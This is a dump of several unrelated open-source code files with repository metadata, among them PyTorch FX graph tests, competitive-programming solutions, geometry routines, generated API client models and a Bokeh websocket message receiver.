to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = to_inline.graph.nodes[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with torch.fx.graph.insert_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
if __name__ == '__main__':
run_tests()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
8b911d329c8bec2537e8276d843ea45bea74e467 | ef187d259d33e97c7b9ed07dfbf065cec3e41f59 | /work/atcoder/abc/abc023/C/answers/112335_Gale.py | 931904830969cd7b6dfccc1f26e1805b2573aa71 | [] | no_license | kjnh10/pcw | 847f7295ea3174490485ffe14ce4cdea0931c032 | 8f677701bce15517fb9362cc5b596644da62dca8 | refs/heads/master | 2020-03-18T09:54:23.442772 | 2018-07-19T00:26:09 | 2018-07-19T00:26:09 | 134,586,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | ame = set()
r, c, k = map(int, input().split())
row_n = [0] * (r + 1)
col_n = [0] * (c + 1)
row_nn = [0] * 100001
col_nn = [0] * 100001
n = int(input())
for _ in range(n):
rr, cc = map(int, input().split())
row_n[rr] += 1
col_n[cc] += 1
ame.add((rr, cc))
for i in range(1, r + 1):
row_nn[row_n[i]] += 1
for i in range(1, c + 1):
col_nn[col_n[i]] += 1
ans = 0
for i in range(k + 1):
ans += row_nn[i] * col_nn[k - i]
for rr, cc in ame:
num = row_n[rr] + col_n[cc]
if num == k:
ans -= 1
if num == k + 1:
ans += 1
print(ans)
| [
"kojinho10@gmail.com"
] | kojinho10@gmail.com |
87e43a21fec53e30d2d5f8bebe82dd4feb5829bd | 32c4a3f8893a7fe9039ebfb2d98215e06203f8f2 | /tests/tensor/coordinate/system/axis/test__axis.py | c8aad570b9de1b5b0b45762a0dd50d4202c819ce | [
"Apache-2.0"
] | permissive | jedhsu/tensor | d27c8951aa32208e3c5bbcef0d0f2bae56f8a670 | 3b2fe21029fa7c50b034190e77d79d1a94ea5e8f | refs/heads/main | 2023-07-06T11:35:36.307538 | 2021-08-07T20:11:19 | 2021-08-07T20:11:19 | 366,904,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | """
*Axis, [Unit Tests]*
"""
from tensor.tensor.coordinate.system.axis._axis import Axis
class TestAxis:
def test_init(self):
a = Axis(5, 0, 1)
assert isinstance(a, Axis)
assert a.ordinal == 5
assert a.origin == 0
assert a.direction == 1
def test_create(self):
a = Axis.create(5)
assert a.origin == 0
assert a.direction == 1
| [
"jed910@gmail.com"
] | jed910@gmail.com |
ca35767c9da032c4f339de5aa5a46487243fc984 | c8a04384030c3af88a8e16de4cedc4ef8aebfae5 | /stubs/pandas/compat/__init__.pyi | 3d2128b4dcb1f4be3619e7a503336c8e387ce6bb | [
"MIT"
] | permissive | Accern/accern-xyme | f61fce4b426262b4f67c722e563bb4297cfc4235 | 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | refs/heads/master | 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 | MIT | 2023-07-19T02:13:18 | 2019-12-09T20:21:59 | Python | UTF-8 | Python | false | false | 803 | pyi | # Stubs for pandas.compat (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level,line-too-long,arguments-differ
# pylint: disable=no-member,too-few-public-methods,keyword-arg-before-vararg
# pylint: disable=super-init-not-called,abstract-method,redefined-builtin
from typing import Any
PY36: Any
PY37: Any
PYPY: Any
def set_function_name(f: Any, name: Any, cls: Any) -> Any:
...
def raise_with_traceback(exc: Any, traceback: Any = ...) -> None:
...
def is_platform_little_endian():
...
def is_platform_windows():
...
def is_platform_linux():
...
def is_platform_mac():
...
def is_platform_32bit():
...
| [
"josua.krause@gmail.com"
] | josua.krause@gmail.com |
50610a3f906a7a87156de10f1d4f14ee940cbcb2 | d532b85841b459c61d88d380e88dd08d29836d43 | /solutions/959_regions_cut_by_slashes.py | b72a08453f9c8c421f6efe61aa9d4386f67a0fa4 | [
"MIT"
] | permissive | YiqunPeng/leetcode_pro | ad942468df5506de9dc48a4019933f658e2a3121 | 4a508a982b125a3a90ea893ae70863df7c99cc70 | refs/heads/master | 2022-05-15T09:32:02.699180 | 2022-05-14T16:32:17 | 2022-05-14T16:32:17 | 182,453,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,711 | py | class Solution:
def regionsBySlashes(self, grid: List[str]) -> int:
n = len(grid)
seen = set()
res = 0
for i in range(n):
for j in range(n):
if (i, j, 0) not in seen:
self._dfs(grid, i, j, 0, seen)
res += 1
if (i, j, 1) not in seen:
self._dfs(grid, i, j, 1, seen)
res += 1
return res
def _dfs(self, grid, i, j, a, seen):
if (i, j, a) in seen:
return
n = len(grid)
seen.add((i, j, a))
if grid[i][j] == ' ':
if a == 0:
self._dfs(grid, i, j, 1, seen)
if i > 0:
if grid[i-1][j] in [' ', '/']:
self._dfs(grid, i-1, j, 1, seen)
else:
self._dfs(grid, i-1, j, 0, seen)
if j > 0:
self._dfs(grid, i, j-1, 1, seen)
else:
self._dfs(grid, i, j, 0, seen)
if j + 1 < n:
self._dfs(grid, i, j+1, 0, seen)
if i + 1 < n:
if grid[i+1][j] in ['/', ' ']:
self._dfs(grid, i+1, j, 0, seen)
else:
self._dfs(grid, i+1, j, 1, seen)
elif grid[i][j] == '\\':
if a == 0:
if j > 0:
self._dfs(grid, i, j-1, 1, seen)
if i + 1 < n:
if grid[i+1][j] in ['/', ' ']:
self._dfs(grid, i+1, j, 0, seen)
else:
self._dfs(grid, i+1, j, 1, seen)
else:
if j + 1 < n:
self._dfs(grid, i, j+1, 0, seen)
if i > 0:
if grid[i-1][j] in [' ', '/']:
self._dfs(grid, i-1, j, 1, seen)
else:
self._dfs(grid, i-1, j, 0, seen)
else:
if a == 0:
if i > 0:
if grid[i-1][j] in [' ', '/']:
self._dfs(grid, i-1, j, 1, seen)
else:
self._dfs(grid, i-1, j, 0, seen)
if j > 0:
self._dfs(grid, i, j-1, 1, seen)
else:
if j + 1 < n:
self._dfs(grid, i, j+1, 0, seen)
if i + 1 < n:
if grid[i+1][j] in ['/', ' ']:
self._dfs(grid, i+1, j, 0, seen)
else:
self._dfs(grid, i+1, j, 1, seen)
| [
"ypeng1@andrew.cmu.edu"
] | ypeng1@andrew.cmu.edu |
df50b05cf5f33bf54acad8204d9968987e7e4ba3 | d51b8b1b55bbcdea55d6ab2b0a97c03cd290868d | /revivalkit/log.py | b03be3472a8d2de8da12f422fc34225da06ed095 | [] | no_license | gogobook/revivalkit | 2c48f9a032b159589a1e8f5b515a22b7fc4e0123 | 3f1eccc6bd80a2c0c4ad7ab60491c98a8d9cd632 | refs/heads/master | 2021-01-16T18:07:53.065671 | 2015-12-12T07:40:32 | 2015-12-12T07:40:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | from __future__ import print_function
import sys
to_print_debug = False
def debug(*args, **arg_ds):
if not to_print_debug: return
print('revivalkit:debug:', *args, file=sys.stderr, **arg_ds)
| [
"mosky.tw@gmail.com"
] | mosky.tw@gmail.com |
1ca5712af3da706bb53d3661f958c30321305c1f | 2fe58e7f6bfc3efdb78ca56f72a4e2a75a24c270 | /eric/eric6/Plugins/__init__.py | fe0b347045e010e41b7ae1988a28bc90b6118bc1 | [] | no_license | testerclub/eric6-20.3 | 3053e0e6962060b213f5df329ee331a4893d18e6 | bba0b9f13fa3eb84938422732d751219bc3e29e2 | refs/heads/master | 2023-03-18T08:24:03.472297 | 2020-03-14T06:44:14 | 2020-03-14T06:44:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2007 - 2020 Detlev Offenbach <detlev@die-offenbachs.de>
#
"""
Package containing all core plugins.
"""
| [
"skeptycal@gmail.com"
] | skeptycal@gmail.com |
fe6f4c64becb61733511e9dd29f3fa33cfdeb957 | aa13e1d93b7a8017e1e610a900bd05f6df91604f | /hackerrank/contests/hourrank7/array-splitting.py | 3e61e19ff22b66ac69f49c320ebb26f4cad2c1db | [] | no_license | laveesingh/Competitive-Programming | 3ce3272eab525635f9ce400f7467ee09de8b51df | 41047f47c23bc8572a1891e891a03cc3f751e588 | refs/heads/master | 2021-01-24T09:51:00.332543 | 2017-10-30T17:11:48 | 2017-10-30T17:11:48 | 52,956,650 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | from pprint import pprint
ans = 0
# dict[tuple] = (divided tuple of list), value
def isPos(a, n):
s = 0
s2 = sum(a)
for i in xrange(len(a)-1):
s += a[i]
s2 -= a[i]
if s == s2 and i != len(a)-1:
return (a[:i+1],a[i+1:], n+1)
return False
store = {}
def solve(a, n):
x = isPos(a, n)
if x:
store[tuple(a)] = x
a1 = x[0]
a2 = x[1]
solve(a1, n+1)
solve(a2, n+1)
for _ in xrange(input()):
n = input()
a = map(int, raw_input().split())
store = {}
solve(a, 0)
ans = 0
for s in store:
if store[s][2] > ans:
ans = store[s][2]
print ans
# def case():
# n = random.randint(1,9)
# print n
# for _ in xrange(n):
# l = random.randint(1,20)
# a = [random.randint(1,8) for i in xrange(l)]
# print l
# for s in a: print s,
# print | [
"laveechaudharytheone@gmail.com"
] | laveechaudharytheone@gmail.com |
0be8c0f0c2fd334cf4240d98ea194ea813adee91 | 2387caf918fa9109568f3f804377c409f7b40fe8 | /distance3d/hydroelastic_contact/_halfplanes.py | d43f8b1483633f57ef2fec53122454584ef197c4 | [
"Zlib",
"MIT",
"BSD-3-Clause",
"BSD-3-Clause-Clear",
"BSL-1.0",
"Unlicense"
] | permissive | AlexanderFabisch/distance3d | aed80c3c4f556f832a44c3b674760db20ef92f2d | 7b2098161a57253c68d3725d63ea235831d272eb | refs/heads/master | 2023-08-19T06:56:30.725164 | 2023-08-03T16:08:51 | 2023-08-03T16:08:51 | 476,051,225 | 30 | 5 | NOASSERTION | 2023-07-28T08:07:23 | 2022-03-30T21:05:48 | Python | UTF-8 | Python | false | false | 3,624 | py | import numba
import numpy as np
from ..utils import norm_vector, EPSILON
# replaces from numba.np.extensions import cross2d, which seems to have a bug
# when called with NUMBA_DISABLE_JIT=1
@numba.njit(
numba.float64(numba.float64[::1], numba.float64[::1]),
cache=True)
def cross2d(a, b):
return a[0] * b[1] - a[1] * b[0]
@numba.njit(
numba.float64[::1](numba.float64[::1], numba.float64[::1]),
cache=True)
def intersect_two_halfplanes(halfplane1, halfplane2):
denom = cross2d(halfplane1[2:], halfplane2[2:])
if abs(denom) < EPSILON:
return np.empty(0, dtype=np.dtype("float"))
t = cross2d((halfplane2[:2] - halfplane1[:2]), halfplane2[2:]) / denom
return halfplane1[:2] + halfplane1[2:] * t
@numba.njit(
numba.bool_(numba.float64[::1], numba.float64[::1]),
cache=True)
def point_outside_of_halfplane(halfplane, point):
return cross2d(halfplane[2:], point - halfplane[:2]) < -EPSILON
@numba.njit(
numba.float64[:, :](numba.float64[:, ::1]), cache=True)
def intersect_halfplanes(halfplanes):
"""Find polygon points by halfplane intersection.
Parameters
----------
halfplanes : array, shape (n_halfplanes, 4)
Halfplanes in contact plane. Each halfplane is defined by a point
p and a direction pq.
Returns
-------
points : list
Points of the polygon.
"""
# reserve more space than required, there might be duplicates
points = np.empty((3 * len(halfplanes), 2))
n_intersections = 0
for i in range(len(halfplanes)):
for j in range(i + 1, len(halfplanes)):
p = intersect_two_halfplanes(halfplanes[i], halfplanes[j])
if len(p) == 0: # parallel halfplanes
continue
valid = True
for k in range(len(halfplanes)):
if k != i and k != j and point_outside_of_halfplane(
halfplanes[k], p):
valid = False
break
if valid:
points[n_intersections] = p
n_intersections += 1
assert n_intersections < len(points)
return points[:n_intersections]
def plot_halfplanes_and_intersections(halfplanes, points=None, xlim=None, ylim=None): # pragma: no cover
import matplotlib.pyplot as plt
if points is None:
scale = 1.0
else:
center = np.mean(points, axis=0)
max_distance = max(np.linalg.norm(points - center, axis=1))
scale = 10.0 * max_distance
plt.figure()
ax = plt.subplot(111, aspect="equal")
for i, halfplane in enumerate(halfplanes):
c = "r" if i < len(halfplanes) // 2 else "b"
plot_halfplane(halfplane, ax, c, 0.5, scale)
if points is not None:
colors = ["r", "g", "b", "orange", "magenta", "brown", "k"][:len(points)]
if len(colors) < len(points):
colors.extend(["k"] * (len(points) - len(colors)))
plt.scatter(points[:, 0], points[:, 1], c=colors, s=100)
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
plt.show()
def plot_halfplane(halfplane, ax, c, alpha, scale): # pragma: no cover
line = (halfplane[:2] + np.linspace(-scale, scale, 101)[:, np.newaxis]
* norm_vector(halfplane[2:]))
ax.plot(line[:, 0], line[:, 1], lw=3, c=c, alpha=alpha)
normal2d = np.array([-halfplane[3], halfplane[2]])
for p in line[::10]:
normal = (p + np.linspace(0.0, 0.1 * scale, 101)[:, np.newaxis]
* norm_vector(normal2d))
ax.plot(normal[:, 0], normal[:, 1], c=c, alpha=0.5 * alpha)
| [
"afabisch@googlemail.com"
] | afabisch@googlemail.com |
f6f0da799baa0c953facd5a352662624b46d44c9 | f9e1d9c71d232aa0bcf03627259e6c9f88538b18 | /gs108ExtraMethodsOfClassBasedView/gs108/asgi.py | 2cd325422ba75b65fd77dbbeaf2e0635a1336874 | [] | no_license | nayan-gujju/Django-Practice | a7db202b6a3627a6a4e9f96953b61e43eaf68cb1 | eafa29e9321a1683867b2ea1d26ca74dfa6db12d | refs/heads/master | 2023-07-27T11:41:43.956705 | 2021-09-09T08:47:44 | 2021-09-09T08:47:44 | 403,917,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
ASGI config for gs108 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gs108.settings')
application = get_asgi_application()
| [
"nayangujarati007@gmail.com"
] | nayangujarati007@gmail.com |
7947c7a7858c6399fa83aeee2c2115a32a62c5f5 | c6e5d5ff2ee796fd42d7895edd86a49144998067 | /platform/polycommon/polycommon/live_state.py | 2f5680bf039683418e6233de246bbf5e217f1810 | [
"Apache-2.0"
] | permissive | zeyaddeeb/polyaxon | f4481059f93d8b70fb3d41840a244cd9aaa871e0 | 1f2b236f3ef36cf2aec4ad9ec78520dcc9ef4ee5 | refs/heads/master | 2023-01-19T05:15:34.334784 | 2020-11-27T17:08:35 | 2020-11-27T17:08:35 | 297,410,504 | 0 | 0 | Apache-2.0 | 2020-09-21T17:20:27 | 2020-09-21T17:20:26 | null | UTF-8 | Python | false | false | 198 | py | STATE_LIVE = 1
STATE_ARCHIVED = 0
STATE_DELETION_PROGRESSING = -1
CHOICES = (
(STATE_LIVE, "live"),
(STATE_ARCHIVED, "archived"),
(STATE_DELETION_PROGRESSING, "deletion_progressing"),
)
| [
"contact@polyaxon.com"
] | contact@polyaxon.com |
55a04939f3799c5645a196ee9769032e5a0efd68 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_21/models/local_group_membership_post.py | fcc7518cae6098afbd8512b4e37e409abe4850f1 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 3,982 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.21
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_21 import models
class LocalGroupMembershipPost(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'members': 'list[LocalgroupmembershippostMembers]'
}
attribute_map = {
'members': 'members'
}
required_args = {
}
def __init__(
self,
members=None, # type: List[models.LocalgroupmembershippostMembers]
):
"""
Keyword args:
members (list[LocalgroupmembershippostMembers]): A list of resources to be a member of the group.
"""
if members is not None:
self.members = members
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LocalGroupMembershipPost, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LocalGroupMembershipPost):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"noreply@github.com"
] | PureStorage-OpenConnect.noreply@github.com |
1e6853ac04cd59b0da08c492ad82eb7292a0b5e7 | 455706c02fb0a5dfcb29572779c2dde34ecb3c1c | /django_oopviews/base.py | 6f018dc6ed93cbd70df1ae51cd6070e7aca285df | [
"BSD-3-Clause"
] | permissive | zerok/django-oopviews | 581293aaab673559186e2e570f37bc4eea8d39ea | 8b80cae437b6089310ae12dd76532624c84db18b | refs/heads/master | 2016-09-05T13:16:34.013936 | 2008-11-11T00:46:35 | 2008-11-11T00:46:35 | 57,663 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,776 | py | """
In some instances you end up producing tons of views that actually do mostly
the same except for perhaps one or two lines. This module offers you a simple
alternative::
from django_oopviews import create_view, BaseView
class View1(BaseView):
def __init__(self, request, *args, **kwargs):
# Here you have your common code
self.my_variable = 1
def __call__(self, request, *args, **kwargs):
whatever = self.my_variable + 1
return HttpResponse(whatever)
class View2(View1):
def __call__(self, request, *args, **kwargs):
return HttpResponse(self.my_variable)
view1 = create_view(View1)
view2 = create_view(View2)
In this example, the code in ``View1.__init__`` is shared between View1 and
View2, so you don't need to write it again.
If you want to share some HttpResponse post-processing, implement the
``BaseView.__after__(self, response_obj)`` method
For more details check out this `blog post`_
.. _blog post: http://zerokspot.com/weblog/1037/
"""
__all__ = ('create_view', 'BaseView', )
def create_view(klass):
"""
This is the generator function for your view. Simply pass it the class
of your view implementation (ideally a subclass of BaseView or at least
duck-type-compatible) and it will give you a function that you can
add to your urlconf.
"""
def _func(request, *args, **kwargs):
"""
Constructed function that actually creates and executes your view
instance.
"""
view_instance = klass(request, *args, **kwargs)
response = view_instance(request, *args, **kwargs)
after = getattr(view_instance, '__after__', None)
if after is None:
return response
else:
return view_instance.__after__(response)
setattr(_func, '_class', klass)
return _func
class BaseView(object):
"""
The Base-class for OOPViews. Inherit it and overwrite the __init__,
__call__ and/or __after__ methods.
"""
def __init__(self, request, *args, **kwargs):
"""
In the constructor you can easily aggregate common functinality.
"""
pass
def __call__(self, request, *args, **kwargs):
"""
This is the method where you want to put the part of your code, that
is absolutely view-specific.
"""
raise RuntimeError, "You have to override BaseView's __call__ method"
def __after__(self, response):
"""
If you want to share some response processing between multiple views
without using a middleware and filter the affected views there,
this method is for you.
"""
return response
| [
"zerok@zerokspot.com"
] | zerok@zerokspot.com |
67ceade67a7d9a435d33fe714ae6051a373d2f92 | e86dedc5b0bb79b9eba41e74c343e77bd1ee1512 | /lldb/test/API/commands/expression/import-std-module/sysroot/TestStdModuleSysroot.py | 014a35458d66fa1a5fc78a34595ca0b20de85127 | [
"NCSA",
"LLVM-exception",
"Apache-2.0"
] | permissive | shafik/llvm-project | a5e1b66fb053f9aa01720a40ea7985b4cc57d16f | be556c838de06c3c2f69bf594996cace6ffa17eb | refs/heads/main | 2023-05-28T22:35:12.937142 | 2023-05-16T18:22:53 | 2023-05-16T18:25:41 | 221,325,771 | 0 | 0 | Apache-2.0 | 2019-11-12T22:40:44 | 2019-11-12T22:40:44 | null | UTF-8 | Python | false | false | 1,493 | py | """
Test that we respect the sysroot when building the std module.
"""
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
import os
class ImportStdModule(TestBase):
# We only emulate a fake libc++ in this test and don't use the real libc++,
# but we still add the libc++ category so that this test is only run in
# test configurations where libc++ is actually supposed to be tested.
@add_test_categories(["libc++"])
@skipIf(compiler=no_match("clang"))
@skipIfRemote # This test messes with the platform, can't be run remotely.
def test(self):
self.build()
sysroot = os.path.join(os.getcwd(), "root")
# Set the sysroot.
self.runCmd("platform select --sysroot '" + sysroot + "' host",
CURRENT_EXECUTABLE_SET)
lldbutil.run_to_source_breakpoint(self,
"// Set break point at this line.",
lldb.SBFileSpec("main.cpp"))
self.runCmd("settings set target.import-std-module true")
# Call our custom function in our sysroot std module.
# If this gives us the correct result, then we used the sysroot.
# We rely on the default argument of -123 to make sure we actually have the C++ module.
# (We don't have default arguments in the debug information).
self.expect("expr std::myabs()", substrs=['(int) $0 = 123'])
| [
"teemperor@gmail.com"
] | teemperor@gmail.com |
6a3c75482f7f16ad0223ab79c872be430da13d6f | cdaeb2c9bbb949b817f9139db2d18120c70f1694 | /rakam_client/models/error_message.py | db883d4928c04f945e167febf9fbc9a5b5a2119b | [
"Apache-2.0"
] | permissive | sreekanthpulagam/rakam-python-client | 665c984ac7a29b57ead6feaeb99a69ba345220e6 | 8bd843208b03726d6ce89ee343b48b889b576e0e | refs/heads/master | 2021-01-24T15:42:36.374366 | 2016-07-19T21:49:26 | 2016-07-19T21:49:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,002 | py | # coding: utf-8
"""
Rakam API Documentation
An analytics platform API that lets you create your own analytics services.
OpenAPI spec version: 0.5
Contact: contact@rakam.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class ErrorMessage(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, error=None, error_code=None):
"""
ErrorMessage - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'error': 'str',
'error_code': 'int'
}
self.attribute_map = {
'error': 'error',
'error_code': 'error_code'
}
self._error = error
self._error_code = error_code
@property
def error(self):
"""
Gets the error of this ErrorMessage.
:return: The error of this ErrorMessage.
:rtype: str
"""
return self._error
@error.setter
def error(self, error):
"""
Sets the error of this ErrorMessage.
:param error: The error of this ErrorMessage.
:type: str
"""
self._error = error
@property
def error_code(self):
"""
Gets the error_code of this ErrorMessage.
:return: The error_code of this ErrorMessage.
:rtype: int
"""
return self._error_code
@error_code.setter
def error_code(self, error_code):
"""
Sets the error_code of this ErrorMessage.
:param error_code: The error_code of this ErrorMessage.
:type: int
"""
self._error_code = error_code
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"emrekabakci@gmail.com"
] | emrekabakci@gmail.com |
f44b857fddcb103a891ca98241641c61f9c04692 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_188/ch73_2019_04_04_18_34_54_400262.py | cd8882d0dc247c4bb07246006762dc9e2db0cd04 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | def remove_vogais(frase):
frase = str(frase)
frase = frase.lower()
vogais = ["a", "e", "i", "o", "u"]
contador = 0
sem_vogais = ""
while contador < len(frase):
if vogais not in frase[contador]:
sem_vogais += frase[contador]
contador += 1
return sem_vogais | [
"you@example.com"
] | you@example.com |
f8ac40843de7f398c6de044fef0cb2f7be52b6fa | 1dacbf90eeb384455ab84a8cf63d16e2c9680a90 | /pkgs/bokeh-0.11.1-py27_0/lib/python2.7/site-packages/bokeh/server/protocol/receiver.py | 9d0143575ad9d50cb757456cb0c4061dbac5d25d | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] | permissive | wangyum/Anaconda | ac7229b21815dd92b0bd1c8b7ec4e85c013b8994 | 2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6 | refs/heads/master | 2022-10-21T15:14:23.464126 | 2022-10-05T12:10:31 | 2022-10-05T12:10:31 | 76,526,728 | 11 | 10 | Apache-2.0 | 2022-10-05T12:10:32 | 2016-12-15T05:26:12 | Python | UTF-8 | Python | false | false | 3,054 | py | ''' Assemble websocket wire message fragments into complete Bokeh Server
message objects that can be processed.
'''
from __future__ import absolute_import
import six
from tornado.concurrent import return_future
from ..exceptions import ValidationError
import logging
log = logging.getLogger(__name__)
class Receiver(object):
'''
On MessageError or ValidationError, the receiver will reset its state
and attempt to consume a new message.
NOTE: the *fragment* received can be either bytes or unicode, depending
on the transport's semantics (WebSocket allows both).
[
# these are required
b'{header}', # serialized header dict
b'{metadata}', # serialized metadata dict
b'{content}, # serialized content dict
# these are optional, and come in pairs; header contains num_buffers
b'{buf_header}', # serialized buffer header dict
b'array' # raw buffer payload data
...
]
'''
def __init__(self, protocol):
self._protocol = protocol
self._current_consumer = self._HEADER
self._message = None
self._buf_header = None
@return_future
def consume(self, fragment, callback=None):
'''
'''
self._current_consumer(fragment)
callback(self._message)
def _HEADER(self, fragment):
self._assume_text(fragment)
self._message = None
self._partial = None
self._fragments = [fragment]
self._current_consumer = self._METADATA
def _METADATA(self, fragment):
self._assume_text(fragment)
self._fragments.append(fragment)
self._current_consumer = self._CONTENT
def _CONTENT(self, fragment):
self._assume_text(fragment)
self._fragments.append(fragment)
header_json, metadata_json, content_json = self._fragments[:3]
self._partial = self._protocol.assemble(header_json, metadata_json, content_json)
self._check_complete()
def _BUFFER_HEADER(self, fragment):
self._assume_text(fragment)
self._buf_header = fragment
self._current_consumer = self._BUFFER_PAYLOAD
def _BUFFER_PAYLOAD(self, fragment):
self._assume_binary(fragment)
self._partial.assemble_buffer(self._buf_header, fragment)
self._check_complete()
def _check_complete(self):
if self._partial.complete:
self._message = self._partial
